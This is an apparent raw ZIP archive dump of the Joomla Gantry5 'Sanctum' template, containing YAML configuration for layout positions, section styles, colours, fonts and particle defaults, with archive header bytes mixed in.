    position-position-8918: position-content-top-a
    position-position-4726: position-content-top-b
    system-content-7865: system-content-1470
    position-position-9471: position-content-bottom-a
    position-position-6475: position-content-bottom-b
    mainbottom: mainbottom
    position-position-8823: position-mainbottom-a
    position-position-2148: position-mainbottom-b
    position-position-5376: position-mainbottom-c
    position-position-5235: position-mainbottom-d
    extension: extension
    position-position-2504: position-extension-a
    position-position-8947: position-extension-b
    position-position-1860: position-extension-c
    position-position-7253: position-extension-d
    additional: additional
    position-position-9368: position-additional-a
    position-position-1506: position-additional-b
    position-position-4196: position-additional-c
    position-position-9407: position-additional-d
    prebottom: prebottom
    position-position-6801: position-prebottom-a
    position-position-2384: position-prebottom-b
    position-position-9956: position-prebottom-c
    position-position-2351: position-prebottom-d
    bottom: bottom
    position-position-7196: position-bottom-a
    position-position-9592: position-bottom-b
    position-position-5753: position-bottom-c
    position-position-5456: position-bottom-d
    afterbottom: afterbottom
    position-position-4910: position-afterbottom-a
    position-position-3419: position-afterbottom-b
    position-position-1718: position-afterbottom-c
    position-position-7824: position-afterbottom-d
    last: last
    position-position-3569: position-last-a
    position-position-9637: position-last-b
    position-position-2550: position-last-c
    position-position-1435: position-last-d
    footer: footer
    position-position-9108: position-footer-a
    position-position-8026: position-footer-b
    position-position-7438: position-footer-c
    position-position-7932: position-footer-d
    copyright: copyright
    position-position-9174: position-copyright-a
    position-position-2815: position-copyright-b
    position-position-3167: position-copyright-c
    position-position-1679: position-copyright-d
    to-top: to-top
    totop-1762: totop-7314
    offcanvas: offcanvas
    mobile-menu-4028: mobile-menu-8307
    position-position-7933: position-offcanvas-a
    position-position-1131: position-offcanvas-b
PK!�K�1'it_sanctum/config/_error/page/body.yamlnu&1i�doctype: html
PK!�Q�9��)it_sanctum/config/_error/page/assets.yamlnu&1i�javascript:
  -
    location: media/jui/js/jquery.min.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: jQuery
  -
    location: media/jui/js/jquery-noconflict.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: 'jQuery NoConflict'
  -
    location: media/jui/js/jquery-migrate.min.js
    inline: ''
    in_footer: '0'
    extra: {  }
    name: 'jQuery Migrate'
PK!1�	�$it_sanctum/config/_error/styles.yamlnu&1i�preset: preset1
PK!l��K��$it_sanctum/config/default/index.yamlnu&1i�name: default
timestamp: 1475821778
version: 7
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
positions:
  drawer: Drawer
  top-a: Top-a
  top-b: Top-b
  top-c: Top-c
  top-d: Top-d
  header-a: Header-a
  header-b: Header-b
  breadcrumb-a: Breadcrumb-a
  breadcrumb-b: Breadcrumb-b
  breadcrumb-c: Breadcrumb-c
  breadcrumb-d: Breadcrumb-d
  fullwidth: Fullwidth
  showcase-a: Showcase-a
  showcase-b: Showcase-b
  showcase-c: Showcase-c
  showcase-d: Showcase-d
  intro-a: Intro-a
  intro-b: Intro-b
  intro-c: Intro-c
  intro-d: Intro-d
  feature-a: Feature-a
  feature-b: Feature-b
  feature-c: Feature-c
  feature-d: Feature-d
  subfeature-a: Subfeature-a
  subfeature-b: Subfeature-b
  subfeature-c: Subfeature-c
  subfeature-d: Subfeature-d
  utility-a: Utility-a
  utility-b: Utility-b
  utility-c: Utility-c
  utility-d: Utility-d
  maintop-a: Maintop-a
  maintop-b: Maintop-b
  maintop-c: Maintop-c
  maintop-d: Maintop-d
  sidebar-left: Sidebar-left
  content-top-a: Content-top-a
  content-top-b: Content-top-b
  content-bottom-a: Content-bottom-a
  content-bottom-b: Content-bottom-b
  sidebar-right: Sidebar-right
  mainbottom-a: Mainbottom-a
  mainbottom-b: Mainbottom-b
  mainbottom-c: Mainbottom-c
  mainbottom-d: Mainbottom-d
  extension-a: Extension-a
  extension-b: Extension-b
  extension-c: Extension-c
  extension-d: Extension-d
  additional-a: Additional-a
  additional-b: Additional-b
  additional-c: Additional-c
  additional-d: Additional-d
  prebottom-a: Prebottom-a
  prebottom-b: Prebottom-b
  prebottom-c: Prebottom-c
  prebottom-d: Prebottom-d
  bottom-a: Bottom-a
  bottom-b: Bottom-b
  bottom-c: Bottom-c
  bottom-d: Bottom-d
  afterbottom-a: Afterbottom-a
  afterbottom-b: Afterbottom-b
  afterbottom-c: Afterbottom-c
  afterbottom-d: Afterbottom-d
  last-a: Last-a
  last-b: Last-b
  last-c: Last-c
  last-d: Last-d
  footer-a: Footer-a
  footer-b: Footer-b
  footer-c: Footer-c
  footer-d: Footer-d
  copyright-a: Copyright-a
  copyright-b: Copyright-b
  copyright-c: Copyright-c
  copyright-d: Copyright-d
  offcanvas-a: Offcanvas-a
  offcanvas-b: Offcanvas-b
sections:
  drawer: Drawer
  top: Top
  navigation: Navigation
  breadcrumb: Breadcrumb
  fullwidth: Fullwidth
  showcase: Showcase
  intro: Intro
  feature: Feature
  subfeature: Subfeature
  utility: Utility
  maintop: Maintop
  system-messages: System-messages
  sidebar: Sidebar
  mainbody: Mainbody
  mainbottom: Mainbottom
  extension: Extension
  additional: Additional
  prebottom: Prebottom
  bottom: Bottom
  afterbottom: Afterbottom
  last: Last
  copyright: Copyright
  to-top: To-top
  header: Header
  aside: Aside
  footer: Footer
  offcanvas: Offcanvas
particles:
  position:
    position-drawer: Drawer
    position-top-a: Top-a
    position-top-b: Top-b
    position-top-c: Top-c
    position-top-d: Top-d
    position-navigation-c: Header-a
    position-navigation-d: Header-b
    position-breadcrumb-a: Breadcrumb-a
    position-breadcrumb-b: Breadcrumb-b
    position-breadcrumb-c: Breadcrumb-c
    position-breadcrumb-d: Breadcrumb-d
    position-fullwidth: Fullwidth
    position-showcase-a: Showcase-a
    position-showcase-b: Showcase-b
    position-showcase-c: Showcase-c
    position-showcase-d: Showcase-d
    position-intro-a: Intro-a
    position-intro-b: Intro-b
    position-intro-c: Intro-c
    position-intro-d: Intro-d
    position-feature-a: Feature-a
    position-feature-b: Feature-b
    position-feature-c: Feature-c
    position-feature-d: Feature-d
    position-subfeature-a: Subfeature-a
    position-subfeature-b: Subfeature-b
    position-subfeature-c: Subfeature-c
    position-subfeature-d: Subfeature-d
    position-utility-a: Utility-a
    position-utility-b: Utility-b
    position-utility-c: Utility-c
    position-utility-d: Utility-d
    position-maintop-a: Maintop-a
    position-maintop-b: Maintop-b
    position-maintop-c: Maintop-c
    position-maintop-d: Maintop-d
    position-sidebar-left: Sidebar-left
    position-content-top-a: Content-top-a
    position-content-top-b: Content-top-b
    position-content-bottom-a: Content-bottom-a
    position-content-bottom-b: Content-bottom-b
    position-sidebar-right: Sidebar-right
    position-mainbottom-a: Mainbottom-a
    position-mainbottom-b: Mainbottom-b
    position-mainbottom-c: Mainbottom-c
    position-mainbottom-d: Mainbottom-d
    position-extension-a: Extension-a
    position-extension-b: Extension-b
    position-extension-c: Extension-c
    position-extension-d: Extension-d
    position-additional-a: Additional-a
    position-additional-b: Additional-b
    position-additional-c: Additional-c
    position-additional-d: Additional-d
    position-prebottom-a: Prebottom-a
    position-prebottom-b: Prebottom-b
    position-prebottom-c: Prebottom-c
    position-prebottom-d: Prebottom-d
    position-bottom-a: Bottom-a
    position-bottom-b: Bottom-b
    position-bottom-c: Bottom-c
    position-bottom-d: Bottom-d
    position-afterbottom-a: Afterbottom-a
    position-afterbottom-b: Afterbottom-b
    position-afterbottom-c: Afterbottom-c
    position-afterbottom-d: Afterbottom-d
    position-last-a: Last-a
    position-last-b: Last-b
    position-last-c: Last-c
    position-last-d: Last-d
    position-footer-a: Footer-a
    position-footer-b: Footer-b
    position-footer-c: Footer-c
    position-footer-d: Footer-d
    position-copyright-a: Copyright-a
    position-copyright-b: Copyright-b
    position-copyright-c: Copyright-c
    position-copyright-d: Copyright-d
    position-offcanvas-a: Offcanvas-a
    position-offcanvas-b: Offcanvas-b
  logo:
    logo-6391: Logo
  menu:
    menu-6643: Menu
  messages:
    system-messages-4492: 'System Messages'
  content:
    system-content-1470: 'Page Content'
  totop:
    totop-7314: Totop
  mobile-menu:
    mobile-menu-8307: Mobile-menu
inherit: {  }
PK!~Qj��(�(%it_sanctum/config/default/layout.yamlnu&1i�version: 2
preset:
  image: 'gantry-admin://images/layouts/default.png'
  name: default
  timestamp: 1473315426
layout:
  /drawer/:
    -
      - position-drawer
  /top/:
    -
      - 'position-top-a 25'
      - 'position-top-b 25'
      - 'position-top-c 25'
      - 'position-top-d 25'
  /header/:
    -
      - 'position-navigation-c 33.3'
      - 'logo-6391 33.3'
      - 'position-navigation-d 33.3'
  /navigation/:
    -
      - menu-6643
  /breadcrumb/:
    -
      - 'position-breadcrumb-a 25'
      - 'position-breadcrumb-b 25'
      - 'position-breadcrumb-c 25'
      - 'position-breadcrumb-d 25'
  /fullwidth/:
    -
      - position-fullwidth
  /showcase/:
    -
      - 'position-showcase-a 25'
      - 'position-showcase-b 25'
      - 'position-showcase-c 25'
      - 'position-showcase-d 25'
  /intro/:
    -
      - 'position-intro-a 25'
      - 'position-intro-b 25'
      - 'position-intro-c 25'
      - 'position-intro-d 25'
  /feature/:
    -
      - 'position-feature-a 25'
      - 'position-feature-b 25'
      - 'position-feature-c 25'
      - 'position-feature-d 25'
  /subfeature/:
    -
      - 'position-subfeature-a 25'
      - 'position-subfeature-b 25'
      - 'position-subfeature-c 25'
      - 'position-subfeature-d 25'
  /utility/:
    -
      - 'position-utility-a 25'
      - 'position-utility-b 25'
      - 'position-utility-c 25'
      - 'position-utility-d 25'
  /maintop/:
    -
      - 'position-maintop-a 25'
      - 'position-maintop-b 25'
      - 'position-maintop-c 25'
      - 'position-maintop-d 25'
  /system-messages/:
    -
      - system-messages-4492
  /container-main/:
    -
      -
        'sidebar 30':
          -
            - position-sidebar-left
      -
        'mainbody 40':
          -
            - 'position-content-top-a 50'
            - 'position-content-top-b 50'
          -
            - system-content-1470
          -
            - 'position-content-bottom-a 50'
            - 'position-content-bottom-b 50'
      -
        'aside 30':
          -
            - position-sidebar-right
  /mainbottom/:
    -
      - 'position-mainbottom-a 25'
      - 'position-mainbottom-b 25'
      - 'position-mainbottom-c 25'
      - 'position-mainbottom-d 25'
  /extension/:
    -
      - 'position-extension-a 25'
      - 'position-extension-b 25'
      - 'position-extension-c 25'
      - 'position-extension-d 25'
  /additional/:
    -
      - 'position-additional-a 25'
      - 'position-additional-b 25'
      - 'position-additional-c 25'
      - 'position-additional-d 25'
  /prebottom/:
    -
      - 'position-prebottom-a 25'
      - 'position-prebottom-b 25'
      - 'position-prebottom-c 25'
      - 'position-prebottom-d 25'
  /bottom/:
    -
      - 'position-bottom-a 25'
      - 'position-bottom-b 25'
      - 'position-bottom-c 25'
      - 'position-bottom-d 25'
  /afterbottom/:
    -
      - 'position-afterbottom-a 25'
      - 'position-afterbottom-b 25'
      - 'position-afterbottom-c 25'
      - 'position-afterbottom-d 25'
  /last/:
    -
      - 'position-last-a 25'
      - 'position-last-b 25'
      - 'position-last-c 25'
      - 'position-last-d 25'
  /footer/:
    -
      - 'position-footer-a 25'
      - 'position-footer-b 25'
      - 'position-footer-c 45'
      - 'position-footer-d 5'
  /copyright/:
    -
      - 'position-copyright-a 25'
      - 'position-copyright-b 25'
      - 'position-copyright-c 25'
      - 'position-copyright-d 25'
  /to-top/:
    -
      - totop-7314
  offcanvas:
    -
      - mobile-menu-8307
    -
      - position-offcanvas-a
    -
      - position-offcanvas-b
structure:
  drawer:
    type: section
    attributes:
      boxed: ''
  top:
    type: section
    attributes:
      boxed: ''
  header:
    attributes:
      boxed: ''
      class: ''
  navigation:
    type: section
    attributes:
      boxed: ''
      class: ''
      extra:
        -
          data-uk-sticky: '{media: 768}'
  breadcrumb:
    type: section
    attributes:
      boxed: ''
  fullwidth:
    type: section
    attributes:
      boxed: ''
  showcase:
    type: section
    attributes:
      boxed: ''
  intro:
    type: section
    attributes:
      boxed: ''
  feature:
    type: section
    attributes:
      boxed: ''
  subfeature:
    type: section
    attributes:
      boxed: ''
  utility:
    type: section
    attributes:
      boxed: ''
  maintop:
    type: section
    attributes:
      boxed: ''
  system-messages:
    type: section
    attributes:
      boxed: ''
  sidebar:
    type: section
    attributes:
      class: ''
    block:
      fixed: '1'
  mainbody:
    type: section
  aside:
    attributes:
      class: ''
    block:
      fixed: '1'
  container-main:
    attributes:
      boxed: ''
  mainbottom:
    type: section
    attributes:
      boxed: ''
  extension:
    type: section
    attributes:
      boxed: ''
  additional:
    type: section
    attributes:
      boxed: ''
  prebottom:
    type: section
    attributes:
      boxed: ''
  bottom:
    type: section
    attributes:
      boxed: ''
  afterbottom:
    type: section
    attributes:
      boxed: ''
  last:
    type: section
    attributes:
      boxed: ''
  footer:
    attributes:
      boxed: ''
  copyright:
    type: section
    attributes:
      boxed: ''
  to-top:
    type: section
    attributes:
      boxed: ''
  offcanvas:
    attributes:
      position: g-offcanvas-left
      class: ''
      extra: {  }
      swipe: '0'
      css3animation: '1'
content:
  position-drawer:
    attributes:
      key: drawer
  position-top-a:
    attributes:
      key: top-a
  position-top-b:
    attributes:
      key: top-b
    block:
      class: hidden-phone
  position-top-c:
    attributes:
      key: top-c
  position-top-d:
    attributes:
      key: top-d
  position-navigation-c:
    title: Header-a
    attributes:
      key: header-a
  position-navigation-d:
    title: Header-b
    attributes:
      key: header-b
  menu-6643:
    attributes:
      mobileTarget: '1'
  position-breadcrumb-a:
    attributes:
      key: breadcrumb-a
  position-breadcrumb-b:
    attributes:
      key: breadcrumb-b
  position-breadcrumb-c:
    attributes:
      key: breadcrumb-c
  position-breadcrumb-d:
    attributes:
      key: breadcrumb-d
  position-fullwidth:
    attributes:
      key: fullwidth
  position-showcase-a:
    attributes:
      key: showcase-a
  position-showcase-b:
    attributes:
      key: showcase-b
  position-showcase-c:
    attributes:
      key: showcase-c
  position-showcase-d:
    attributes:
      key: showcase-d
  position-intro-a:
    attributes:
      key: intro-a
  position-intro-b:
    attributes:
      key: intro-b
  position-intro-c:
    attributes:
      key: intro-c
  position-intro-d:
    attributes:
      key: intro-d
  position-feature-a:
    attributes:
      key: feature-a
  position-feature-b:
    attributes:
      key: feature-b
  position-feature-c:
    attributes:
      key: feature-c
  position-feature-d:
    attributes:
      key: feature-d
  position-subfeature-a:
    attributes:
      key: subfeature-a
  position-subfeature-b:
    attributes:
      key: subfeature-b
  position-subfeature-c:
    attributes:
      key: subfeature-c
  position-subfeature-d:
    attributes:
      key: subfeature-d
  position-utility-a:
    attributes:
      key: utility-a
  position-utility-b:
    attributes:
      key: utility-b
  position-utility-c:
    attributes:
      key: utility-c
  position-utility-d:
    attributes:
      key: utility-d
  position-maintop-a:
    attributes:
      key: maintop-a
  position-maintop-b:
    attributes:
      key: maintop-b
  position-maintop-c:
    attributes:
      key: maintop-c
  position-maintop-d:
    attributes:
      key: maintop-d
  position-sidebar-left:
    attributes:
      key: sidebar-left
  position-content-top-a:
    attributes:
      key: content-top-a
  position-content-top-b:
    attributes:
      key: content-top-b
  position-content-bottom-a:
    attributes:
      key: content-bottom-a
  position-content-bottom-b:
    attributes:
      key: content-bottom-b
  position-sidebar-right:
    attributes:
      key: sidebar-right
  position-mainbottom-a:
    attributes:
      key: mainbottom-a
  position-mainbottom-b:
    attributes:
      key: mainbottom-b
  position-mainbottom-c:
    attributes:
      key: mainbottom-c
  position-mainbottom-d:
    attributes:
      key: mainbottom-d
  position-extension-a:
    attributes:
      key: extension-a
  position-extension-b:
    attributes:
      key: extension-b
  position-extension-c:
    attributes:
      key: extension-c
  position-extension-d:
    attributes:
      key: extension-d
  position-additional-a:
    attributes:
      key: additional-a
  position-additional-b:
    attributes:
      key: additional-b
  position-additional-c:
    attributes:
      key: additional-c
  position-additional-d:
    attributes:
      key: additional-d
  position-prebottom-a:
    attributes:
      key: prebottom-a
  position-prebottom-b:
    attributes:
      key: prebottom-b
  position-prebottom-c:
    attributes:
      key: prebottom-c
  position-prebottom-d:
    attributes:
      key: prebottom-d
  position-bottom-a:
    attributes:
      key: bottom-a
  position-bottom-b:
    attributes:
      key: bottom-b
  position-bottom-c:
    attributes:
      key: bottom-c
  position-bottom-d:
    attributes:
      key: bottom-d
  position-afterbottom-a:
    attributes:
      key: afterbottom-a
  position-afterbottom-b:
    attributes:
      key: afterbottom-b
  position-afterbottom-c:
    attributes:
      key: afterbottom-c
  position-afterbottom-d:
    attributes:
      key: afterbottom-d
  position-last-a:
    attributes:
      key: last-a
  position-last-b:
    attributes:
      key: last-b
  position-last-c:
    attributes:
      key: last-c
  position-last-d:
    attributes:
      key: last-d
  position-footer-a:
    attributes:
      key: footer-a
  position-footer-b:
    attributes:
      key: footer-b
  position-footer-c:
    attributes:
      key: footer-c
  position-footer-d:
    attributes:
      key: footer-d
  position-copyright-a:
    attributes:
      key: copyright-a
  position-copyright-b:
    attributes:
      key: copyright-b
  position-copyright-c:
    attributes:
      key: copyright-c
  position-copyright-d:
    attributes:
      key: copyright-d
  position-offcanvas-a:
    attributes:
      key: offcanvas-a
  position-offcanvas-b:
    attributes:
      key: offcanvas-b
PK!;%�t��%it_sanctum/config/default/styles.yamlnu&1i�preset: preset1
base:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
fonts:
  body-font: family=Lato
  heading-font: family=Cormorant+SC
  menu-font: family=Cormorant+SC
fontsizes:
  body-font-size: 0.9rem
  menu-font-size: 1rem
accent:
  color-1: '#c91f37'
  color-2: '#282828'
drawer:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
top:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
header:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
navigation:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#959595'
breadcrumb:
  background-color: '#ffffff'
  background-image: 'gantry-media://bread.png'
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
fullwidth:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
showcase:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
intro:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
feature:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
subfeature:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
utility:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
maintop:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
systemmessages:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
sidebar:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
mainbody:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
aside:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
mainbottom:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
extension:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
additional:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
prebottom:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
bottom:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
afterbottom:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
last:
  background-color: '#ffffff'
  background-image: 'gantry-media://doves.png'
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
footer:
  background-color: '#282828'
  background-image: 'gantry-media://footer.jpg'
  background-repeat: no-repeat
  background-size: cover
  background-attachment: scroll
  text-color: '#6f6f6f'
  heading-color: '#ffffff'
copyright:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#959595'
offcanvas:
  background: '#ffffff'
  text-color: '#959595'
  width: 17rem
  toggle-color: '#959595'
  toggle-position: left
  overlay: 'rgba(0, 0, 0, 0.6)'
breakpoints:
  large-desktop-container: 75rem
  desktop-container: 60rem
  tablet-container: 48rem
  large-mobile-container: 30rem
  mobile-menu-breakpoint: 48rem
menu:
  col-width: 180px
  animation: g-fade
PK!�HC�ee(it_sanctum/config/default/page/body.yamlnu&1i�attribs:
  id: ''
  class: gantry
  extra: {  }
layout:
  sections: '0'
body_top: ''
body_bottom: ''
PK!�51$55*it_sanctum/config/default/page/assets.yamlnu&1i�favicon: ''
touchicon: ''
css: {  }
javascript: {  }
PK!�6^V��(it_sanctum/config/default/page/head.yamlnu&1i�meta: {  }
head_bottom: ''
atoms:
  -
    id: uikit-2431
    type: uikit
    title: 'UIkit for Gantry5'
    attributes:
      enabled: '1'
      jslocation: footer
  -
    id: template-js-7167
    type: template-js
    title: Template.js
    attributes:
      enabled: '1'
  -
    id: scrollreveal-js-5954
    type: scrollreveal-js
    title: ScrollReveal.js
    attributes:
      enabled: '1'
      mobile: 'false'
  -
    id: icon-fonts-7502
    type: icon-fonts
    title: 'Icon Fonts'
    attributes:
      enabled: '1'
      load:
        octicons: '0'
        strokeicon7: '0'
        ionicons: '1'
        themify: '0'
        typicons: '0'
PK!_��552it_sanctum/config/default/particles/copyright.yamlnu&1i�enabled: '1'
date:
  start: now
  end: now
owner: ''
PK!�ѿ��2it_sanctum/config/default/particles/companies.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
navigation: arrows
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!g�Brr0it_sanctum/config/default/particles/pricing.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
gutter: enabled
css:
  class: ''
extra: {  }
items: {  }
PK!a�Z�

8it_sanctum/config/default/particles/system-messages.yamlnu&1i�enabled: '1'
PK!�@�1it_sanctum/config/default/particles/position.yamlnu&1i�enabled: '1'
chrome: ''
PK!a�Z�

0it_sanctum/config/default/particles/content.yamlnu&1i�enabled: '1'
PK!��=��5it_sanctum/config/default/particles/main-feature.yamlnu&1i�enabled: '1'
layout: right
image: ''
alt: ''
imagebottom: 'yes'
title: ''
description: ''
link: ''
buttontext: ''
buttonicon: ''
target: _parent
css:
  class: ''
  left: ''
  right: ''
extra: {  }
extra_left: {  }
extra_right: {  }
PK!'k����1it_sanctum/config/default/particles/branding.yamlnu&1i�enabled: '1'
content: 'Powered by <a href="http://www.gantry.org/" title="Gantry Framework" class="g-powered-by">Gantry Framework</a>'
css:
  class: branding
PK!-��((/it_sanctum/config/default/particles/assets.yamlnu&1i�enabled: '1'
css: {  }
javascript: {  }
PK!a�Z�

/it_sanctum/config/default/particles/spacer.yamlnu&1i�enabled: '1'
PK!��8``/it_sanctum/config/default/particles/social.yamlnu&1i�enabled: '1'
title: ''
target: _blank
tooltippos: auto
css:
  class: ''
extra: {  }
items: {  }
PK!�����2it_sanctum/config/default/particles/portfolio.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
columns: '3'
gutter: enabled
lightbox: enable
filters: disabled
filterall: All
filter1: ''
filter2: ''
filter3: ''
filter4: ''
filter5: ''
css:
  class: ''
extra: {  }
items: {  }
PK!����XX/it_sanctum/config/default/particles/sample.yamlnu&1i�enabled: '1'
image: ''
headline: ''
description: ''
link: ''
linktext: ''
samples: {  }
PK!��oo1it_sanctum/config/default/particles/features.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
columns: '3'
css:
  class: ''
extra: {  }
items: {  }
PK!Z3Ѭ�6it_sanctum/config/default/particles/paypal-donate.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
email: ''
itemname: ''
itemnumber: ''
currencycode: ''
buttontext: ''
buttonicon: ''
target: _blank
css:
  class: ''
extra: {  }
PK!O?k���-it_sanctum/config/default/particles/tabs.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
layout: top
tabswidth: '2'
justify: 'no'
justifynumber: '1'
animation: none
css:
  class: ''
extra: {  }
items: {  }
PK!��$5it_sanctum/config/default/particles/modal-search.yamlnu&1i�enabled: '1'
style: style1
PK!#U�OO.it_sanctum/config/default/particles/totop.yamlnu&1i�enabled: '1'
style: style1
icon: ''
offset: ''
css:
  class: totop
content: ''
PK!����MM3it_sanctum/config/default/particles/page-title.yamlnu&1i�enabled: '1'
title: ''
description: ''
icon: ''
css:
  class: ''
extra: {  }
PK!�f��BB2it_sanctum/config/default/particles/analytics.yamlnu&1i�enabled: '1'
ua:
  code: ''
  anonym: '0'
  ssl: '0'
  debug: '0'
PK!L6rD;it_sanctum/config/default/particles/content-pro-joomla.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
autoplayInterval: '7000'
navigation: arrows
animation: fade
duration: '200'
lightbox: enable
pullup: '0'
css:
  class: ''
extra: {  }
article:
  filter:
    categories: ''
    articles: ''
    featured: include
  limit:
    total: '3'
    start: '0'
  sort:
    orderby: publish_up
    ordering: ASC
  display:
    image:
      enabled: intro
    title:
      enabled: show
      limit: ''
    date:
      enabled: published
      format: 'l, F d, Y'
    author:
      enabled: show
    category:
      enabled: link
    hits:
      enabled: show
    text:
      type: intro
      limit: ''
      formatting: text
    read_more:
      enabled: show
      label: ''
height: ''
PK!������1it_sanctum/config/default/particles/feedback.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
autoplay: disable
navigation: dots
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!�@�/it_sanctum/config/default/particles/module.yamlnu&1i�enabled: '1'
chrome: ''
PK!��s9  9it_sanctum/config/default/particles/offcanvas-toggle.yamlnu&1i�enabled: '1'
icon: 'fa fa-bars'
PK!��K�RR-it_sanctum/config/default/particles/logo.yamlnu&1i�enabled: '1'
url: ''
image: 'gantry-media://logo.png'
text: Sanctum
class: g-logo
PK!a�Z�

1it_sanctum/config/default/particles/messages.yamlnu&1i�enabled: '1'
PK!!Es)661it_sanctum/config/default/particles/contacts.yamlnu&1i�enabled: '1'
css:
  class: ''
extra: {  }
items: {  }
PK!,��'==-it_sanctum/config/default/particles/date.yamlnu&1i�enabled: '1'
css:
  class: date
date:
  formats: 'l, F d, Y'
PK!:�c�4it_sanctum/config/default/particles/content-pro.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
autoplayInterval: '7000'
navigation: arrows
animation: fade
duration: '200'
lightbox: enable
pullup: '0'
css:
  class: ''
extra: {  }
items: {  }
PK!�4&F��3it_sanctum/config/default/particles/cta-button.yamlnu&1i�enabled: '1'
style: style1
title: ''
description: ''
link: ''
buttontext: ''
buttonicon: ''
target: _parent
css:
  class: ''
extra: {  }
PK!�|3���2it_sanctum/config/default/particles/googlemap.yamlnu&1i�enabled: '1'
apikey: ''
width: 100%
height: 500px
maptype: ROADMAP
latitude: '52.052312'
longitude: '4.447141'
zoom: '7'
defaultmarker: show
markertext: ''
markerstate: '1'
scrollwheel: '0'
markers: {  }
snazzymaps: ''
css:
  class: ''
extra: {  }
PK!a�Z�

4it_sanctum/config/default/particles/pagecontent.yamlnu&1i�enabled: '1'
PK!�t�rr-it_sanctum/config/default/particles/menu.yamlnu&1i�enabled: '1'
menu: ''
base: /
startLevel: '1'
maxLevels: '0'
renderTitles: '0'
hoverExpand: '1'
mobileTarget: '0'
PK!P[���2it_sanctum/config/default/particles/slideshow.yamlnu&1i�enabled: '1'
height: auto
autoplay: 'true'
autoplayInterval: '7000'
navigation: arrows
animation: fade
animationDuration: '500'
kenburns: 'false'
pauseOnHover: 'true'
fullscreen: '0'
css:
  class: ''
extra: {  }
items: {  }
PK!��3ww2it_sanctum/config/default/particles/accordion.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
collapse: 'true'
showfirst: 'true'
css:
  class: ''
extra: {  }
items: {  }
PK!�.�zz5it_sanctum/config/default/particles/onepage-menu.yamlnu&1i�enabled: '1'
stickyoffset: '130'
smoothscrolloffset: '120'
